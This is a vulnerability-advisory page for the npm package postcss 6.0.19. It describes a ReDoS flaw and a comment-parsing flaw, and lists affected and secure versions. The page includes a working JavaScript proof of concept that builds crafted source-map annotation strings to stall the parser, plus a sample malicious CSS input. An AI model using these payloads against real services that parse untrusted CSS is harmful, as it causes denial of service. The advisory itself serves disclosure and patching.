NodeJS/postcss/6.0.19


Tool for transforming styles with JS plugins

https://www.npmjs.com/package/postcss
MIT

2 Security Vulnerabilities

Regular Expression Denial of Service in postcss

Published date: 2022-01-07T00:21:36Z
CVE: CVE-2021-23382
Links:

The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes stem mainly from the sub-pattern \/\*\s* sourceMappingURL=(.*)

PoC

// PostCSS entry point; the timing loop below exercises its parser.
const postcss = require("postcss");
/**
 * Build the CSS input used by the timing loop: one empty rule ("a{}"),
 * followed by n copies of the source-map annotation opener
 * "/*# sourceMappingURL=", followed by a single "!".
 *
 * @param {number} n - how many annotation openers to append; the loop runs
 *   while the counter is below n, so non-positive or NaN values yield "a{}!"
 * @returns {string} the assembled CSS string
 */
function build_attack(n) {
  const opener = "/*# sourceMappingURL=";
  const parts = ["a{}"];
  for (let count = 0; count < n; count += 1) {
    parts.push(opener);
  }
  parts.push("!");
  return parts.join("");
}
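// The listing had lost its line breaks, fusing three statements per line
// (e.g. `postcss.parse(...) for (...)`), which does not parse; restored here.

// One parse of a well-formed annotation before the timed runs
// (presumably a warm-up so the first measurement is not skewed by startup).
postcss.parse('a{}/*# sourceMappingURL=a.css.map */');

// Time the parser on progressively longer inputs (every 1000th size up to
// 500000 openers) and log each run. The timer starts after the input is
// built so only the parse itself is measured; on affected versions the cost
// grows faster than the input length (CVE-2021-23382).
for (let i = 1; i <= 500000; i += 1) {
  if (i % 1000 !== 0) continue;
  const attack_str = build_attack(i);
  const started = Date.now();
  try {
    postcss.parse(attack_str);
  } catch (e) {
    // A parse error is still a completed timed run; only the duration matters here.
  } finally {
    const time_cost = Date.now() - started;
    console.log(`attack_str.length: ${attack_str.length}: ${time_cost} ms`);
  }
}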

Affected versions: ["0.1.0", "0.2.0", "0.3.0", "0.3.1", "0.3.2", "0.3.3", "0.3.4", "0.3.5", "1.0.0", "2.0.0", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.2.5", "2.2.6", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "4.0.0", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.0.8", "5.0.9", "5.0.10", "5.0.11", "5.0.12", "5.0.13", "5.0.14", "5.0.15", "5.0.16", "5.0.17", "5.0.18", "5.0.19", "5.0.20", "5.0.21", "5.1.0", "5.1.1", "5.1.2", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.2.6", "5.2.7", "5.2.8", "5.2.9", "5.2.10", "5.2.11", "5.2.12", "5.2.13", "5.2.14", "5.2.15", "5.2.16", "5.2.17", "6.0.0", "6.0.1", "6.0.2", "6.0.3", "6.0.4", "6.0.5", "6.0.6", "6.0.7", "6.0.8", "6.0.9", "6.0.10", "6.0.11", "6.0.12", "5.2.18", "6.0.13", "6.0.14", "6.0.15", "6.0.16", "6.0.17", "6.0.18", "6.0.19", "6.0.20", "6.0.21", "6.0.22", "6.0.23", "7.0.0", "7.0.1", "7.0.2", "7.0.3", "7.0.4", "7.0.5", "7.0.6", "7.0.7", "7.0.8", "7.0.9", "7.0.10", "7.0.11", "7.0.12", "7.0.13", "7.0.14", "7.0.15", "7.0.16", "7.0.17", "7.0.18", "7.0.19", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.24", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.31", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "8.0.0", "8.0.1", "8.0.2", "8.0.3", "8.0.4", "8.0.5", "8.0.6", "8.0.7", "8.0.8", "8.0.9", "8.1.0", "8.1.1", "8.1.2", "8.1.3", "8.1.4", "8.1.5", "8.1.6", "8.1.7", "8.1.8", "8.1.9", "8.1.10", "8.1.11", "8.1.12", "8.1.13", "8.1.14", "8.2.0", "8.2.1", "8.2.2", "8.2.3", "8.2.4", "8.2.5", "8.2.6", "8.2.7", "8.2.8", "8.2.9", "8.2.10", "8.2.11", "8.2.12"]
Secure versions: [8.4.31, 8.4.32, 8.4.33, 8.4.34, 8.4.35, 8.4.36, 8.4.37, 8.4.38]
Recommendation: Update to version 8.4.38.

PostCSS line return parsing error

Published date: 2023-09-30T00:31:10Z
CVE: CVE-2023-44270
Links:

An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.

This vulnerability affects linters using PostCSS to parse external, untrusted CSS. An attacker can prepare CSS so that it contains parts PostCSS parses as a CSS comment. After processing by PostCSS, that content is included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.

Affected versions: ["0.1.0", "0.2.0", "0.3.0", "0.3.1", "0.3.2", "0.3.3", "0.3.4", "0.3.5", "1.0.0", "2.0.0", "2.1.0", "2.1.1", "2.1.2", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.2.5", "2.2.6", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.0.5", "3.0.6", "3.0.7", "4.0.0", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.0.6", "4.1.0", "4.1.1", "4.1.2", "4.1.3", "4.1.4", "4.1.5", "4.1.6", "4.1.7", "4.1.8", "4.1.9", "4.1.10", "4.1.11", "4.1.12", "4.1.13", "4.1.14", "4.1.15", "4.1.16", "5.0.0", "5.0.1", "5.0.2", "5.0.3", "5.0.4", "5.0.5", "5.0.6", "5.0.7", "5.0.8", "5.0.9", "5.0.10", "5.0.11", "5.0.12", "5.0.13", "5.0.14", "5.0.15", "5.0.16", "5.0.17", "5.0.18", "5.0.19", "5.0.20", "5.0.21", "5.1.0", "5.1.1", "5.1.2", "5.2.0", "5.2.1", "5.2.2", "5.2.3", "5.2.4", "5.2.5", "5.2.6", "5.2.7", "5.2.8", "5.2.9", "5.2.10", "5.2.11", "5.2.12", "5.2.13", "5.2.14", "5.2.15", "5.2.16", "5.2.17", "6.0.0", "6.0.1", "6.0.2", "6.0.3", "6.0.4", "6.0.5", "6.0.6", "6.0.7", "6.0.8", "6.0.9", "6.0.10", "6.0.11", "6.0.12", "5.2.18", "6.0.13", "6.0.14", "6.0.15", "6.0.16", "6.0.17", "6.0.18", "6.0.19", "6.0.20", "6.0.21", "6.0.22", "6.0.23", "7.0.0", "7.0.1", "7.0.2", "7.0.3", "7.0.4", "7.0.5", "7.0.6", "7.0.7", "7.0.8", "7.0.9", "7.0.10", "7.0.11", "7.0.12", "7.0.13", "7.0.14", "7.0.15", "7.0.16", "7.0.17", "7.0.18", "7.0.19", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.24", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.31", "7.0.32", "8.0.0", "8.0.1", "8.0.2", "8.0.3", "7.0.33", "8.0.4", "7.0.34", "8.0.5", "8.0.6", "8.0.7", "8.0.8", "8.0.9", "8.1.0", "7.0.35", "8.1.1", "8.1.2", "8.1.3", "8.1.4", "8.1.5", "8.1.6", "8.1.7", "8.1.8", "8.1.9", "8.1.10", "8.1.11", "8.1.12", "8.1.13", "8.1.14", "8.2.0", "8.2.1", "8.2.2", "8.2.3", "8.2.4", "8.2.5", "8.2.6", "8.2.7", "8.2.8", "8.2.9", "8.2.10", "8.2.11", "8.2.12", "8.2.13", "8.2.14", "8.2.15", "8.3.0", "8.3.1", "7.0.36", "8.3.2", "8.3.3", "8.3.4", "8.3.5", "8.3.6", "8.3.7", "7.0.37", "7.0.38", "8.3.8", "7.0.39", 
"8.3.9", "8.3.10", "8.3.11", "8.4.0", "8.4.1", "8.4.2", "8.4.3", "8.4.4", "8.4.5", "8.4.6", "8.4.7", "8.4.8", "8.4.9", "8.4.10", "8.4.11", "8.4.12", "8.4.13", "8.4.14", "8.4.15", "8.4.16", "8.4.17", "8.4.18", "8.4.19", "8.4.20", "8.4.21", "8.4.22", "8.4.23", "8.4.24", "8.4.25", "8.4.26", "8.4.27", "8.4.28", "8.4.29", "8.4.30"]
Secure versions: [8.4.31, 8.4.32, 8.4.33, 8.4.34, 8.4.35, 8.4.36, 8.4.37, 8.4.38]
Recommendation: Update to version 8.4.38.

252 Other Versions

Version License Security Released
8.4.38 MIT 2024-03-20 - 22:55 26 days
8.4.37 MIT 2024-03-19 - 16:57 28 days
8.4.36 MIT 2024-03-17 - 20:09 29 days
8.4.35 MIT 2024-02-07 - 15:37 2 months
8.4.34 MIT 2024-02-05 - 19:22 2 months
8.4.33 MIT 2024-01-04 - 19:04 3 months
8.4.32 MIT 2023-12-02 - 02:56 5 months
8.4.31 MIT 2023-09-28 - 22:15 7 months
8.4.30 MIT 1 2023-09-18 - 21:24 7 months
8.4.29 MIT 1 2023-08-29 - 17:47 8 months
8.4.28 MIT 1 2023-08-15 - 19:12 8 months
8.4.27 MIT 1 2023-07-21 - 11:51 9 months
8.4.26 MIT 1 2023-07-13 - 19:24 9 months
8.4.25 MIT 1 2023-07-06 - 11:44 9 months
8.4.24 MIT 1 2023-05-28 - 09:32 11 months
8.4.23 MIT 1 2023-04-19 - 19:03 12 months
8.4.22 MIT 1 2023-04-16 - 13:02 almost 1 year
8.4.21 MIT 1 2023-01-06 - 20:29 over 1 year
8.4.20 MIT 1 2022-12-11 - 17:35 over 1 year
8.4.19 MIT 1 2022-11-10 - 22:57 over 1 year
8.4.18 MIT 1 2022-10-12 - 19:28 over 1 year
8.4.17 MIT 1 2022-09-30 - 11:29 over 1 year
8.4.16 MIT 1 2022-08-06 - 18:59 over 1 year
8.4.15 MIT 1 2022-08-06 - 18:25 over 1 year
8.4.14 MIT 1 2022-05-18 - 16:14 almost 2 years
8.4.13 MIT 1 2022-04-30 - 00:50 almost 2 years
8.4.12 MIT 1 2022-03-16 - 08:38 about 2 years
8.4.11 MIT 1 2022-03-15 - 18:28 about 2 years
8.4.10 MIT 1 2022-03-15 - 18:18 about 2 years
8.4.9 MIT 1 2022-03-15 - 18:08 about 2 years
8.4.8 MIT 1 2022-03-07 - 02:10 about 2 years
8.4.7 MIT 1 2022-02-24 - 22:07 about 2 years
8.4.6 MIT 1 2022-02-01 - 11:37 about 2 years
8.4.5 MIT 1 2021-12-13 - 00:03 over 2 years
8.4.4 MIT 1 2021-11-27 - 14:58 over 2 years
8.4.3 MIT 1 2021-11-26 - 19:20 over 2 years
8.4.2 MIT 1 2021-11-26 - 18:45 over 2 years
8.4.1 MIT 1 2021-11-24 - 22:06 over 2 years
8.4.0 MIT 1 2021-11-24 - 13:06 over 2 years
8.3.11 MIT 1 2021-10-21 - 12:43 over 2 years
8.3.10 MIT 1 2021-10-20 - 17:47 over 2 years
8.3.9 MIT 1 2021-10-04 - 20:14 over 2 years
8.3.8 MIT 1 2021-09-25 - 07:33 over 2 years
8.3.7 MIT 1 2021-09-22 - 05:54 over 2 years
8.3.6 MIT 1 2021-07-21 - 15:53 over 2 years
8.3.5 MIT 1 2021-06-17 - 03:25 almost 3 years
8.3.4 MIT 1 2021-06-14 - 13:27 almost 3 years
8.3.3 MIT 1 2021-06-14 - 05:34 almost 3 years
8.3.2 MIT 1 2021-06-11 - 02:57 almost 3 years
8.3.1 MIT 1 2021-06-09 - 23:38 almost 3 years
8.3.0 MIT 1 2021-05-21 - 03:41 almost 3 years
8.2.15 MIT 1 2021-05-10 - 19:56 almost 3 years
8.2.14 MIT 1 2021-05-05 - 19:44 almost 3 years
8.2.13 MIT 1 2021-04-26 - 12:26 almost 3 years
8.2.12 MIT 2 2021-04-22 - 15:50 almost 3 years
8.2.11 MIT 2 2021-04-22 - 15:32 almost 3 years
8.2.10 MIT 2 2021-04-11 - 16:37 about 3 years
8.2.9 MIT 3 2021-03-30 - 20:43 about 3 years
8.2.8 MIT 3 2021-03-09 - 22:04 about 3 years
8.2.7 MIT 3 2021-03-03 - 23:25 about 3 years
8.2.6 MIT 3 2021-02-10 - 18:38 about 3 years
8.2.5 MIT 3 2021-02-06 - 18:57 about 3 years
8.2.4 MIT 3 2021-01-09 - 10:28 over 3 years
8.2.3 MIT 3 2021-01-07 - 12:06 over 3 years
8.2.2 MIT 3 2020-12-29 - 20:56 over 3 years
8.2.1 MIT 3 2020-12-09 - 11:52 over 3 years
8.2.0 MIT 3 2020-12-08 - 07:16 over 3 years
8.1.14 MIT 3 2020-12-04 - 00:21 over 3 years
8.1.13 MIT 3 2020-12-03 - 03:14 over 3 years
8.1.12 MIT 3 2020-12-03 - 02:41 over 3 years
8.1.11 MIT 3 2020-12-03 - 01:44 over 3 years
8.1.10 MIT 3 2020-11-23 - 22:17 over 3 years
8.1.9 MIT 3 2020-11-21 - 18:37 over 3 years
8.1.8 MIT 3 2020-11-19 - 15:58 over 3 years
8.1.7 MIT 3 2020-11-10 - 15:58 over 3 years
8.1.6 MIT 3 2020-11-05 - 16:28 over 3 years
8.1.5 MIT 3 2020-11-05 - 15:50 over 3 years
8.1.4 MIT 3 2020-10-24 - 00:03 over 3 years
8.1.3 MIT 3 2020-10-23 - 02:20 over 3 years
8.1.2 MIT 3 2020-10-19 - 00:02 over 3 years
8.1.1 MIT 3 2020-09-28 - 21:47 over 3 years
8.1.0 MIT 3 2020-09-26 - 23:35 over 3 years
8.0.9 MIT 3 2020-09-23 - 17:04 over 3 years
8.0.8 MIT 3 2020-09-23 - 02:11 over 3 years
8.0.7 MIT 3 2020-09-22 - 00:55 over 3 years
8.0.6 MIT 3 2020-09-20 - 16:53 over 3 years
8.0.5 MIT 3 2020-09-17 - 02:42 over 3 years
8.0.4 MIT 3 2020-09-16 - 22:20 over 3 years
8.0.3 MIT 3 2020-09-15 - 19:13 over 3 years
8.0.2 MIT 3 2020-09-15 - 16:46 over 3 years
8.0.1 MIT 3 2020-09-15 - 15:34 over 3 years
8.0.0 MIT 3 2020-09-15 - 15:20 over 3 years
7.0.39 MIT 1 2021-10-04 - 20:12 over 2 years
7.0.38 MIT 1 2021-09-25 - 07:30 over 2 years
7.0.37 MIT 1 2021-09-25 - 07:25 over 2 years
7.0.36 MIT 1 2021-06-11 - 02:45 almost 3 years
7.0.35 MIT 3 2020-09-28 - 21:42 over 3 years
7.0.34 MIT 3 2020-09-17 - 01:56 over 3 years
7.0.33 MIT 3 2020-09-16 - 22:12 over 3 years
7.0.32 MIT 3 2020-06-02 - 12:50 almost 4 years